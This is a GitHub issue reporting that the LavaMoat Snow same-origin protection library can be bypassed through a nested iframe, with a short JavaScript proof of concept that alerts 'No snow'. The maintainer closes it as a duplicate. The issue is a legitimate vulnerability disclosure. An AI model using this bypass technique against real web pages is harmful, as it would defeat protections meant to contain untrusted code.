LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Snow can be bypassed with an iframe to a different origin which has an iframe to the top origin #117

Closed ivars-vids closed 1 year ago

ivars-vids commented 1 year ago

Reproduce by running:

```javascript
(function () {
    // Inject a cross-origin iframe (a data: URL, so it has an opaque origin).
    // The base64 payload decodes to:
    //   <iframe src="https://lavamoat.github.io/snow/demo/404"></iframe>
    // i.e. the foreign frame itself embeds a frame from the top-level origin.
    const a = document.createElement('div');
    a.innerHTML = '<iframe src="data:text/html;base64,PGlmcmFtZSBzcmM9Imh0dHBzOi8vbGF2YW1vYXQuZ2l0aHViLmlvL3Nub3cvZGVtby80MDQiPjwvaWZyYW1lPiAg"></iframe>';
    document.head.appendChild(a);
    // Once both frames have loaded, reach the same-origin inner frame through the
    // cross-origin outer one: frames[0] is the data: frame, frames[0][0] the inner
    // frame from the top origin, whose realm Snow has not covered.
    setTimeout(_ => { frames[0][0].alert('No snow'); }, 500);
}());
```
weizman commented 1 year ago

@ivars-vids thank you for the report. Closing as a duplicate, though: https://github.com/LavaMoat/snow/issues/73#issuecomment-1465143307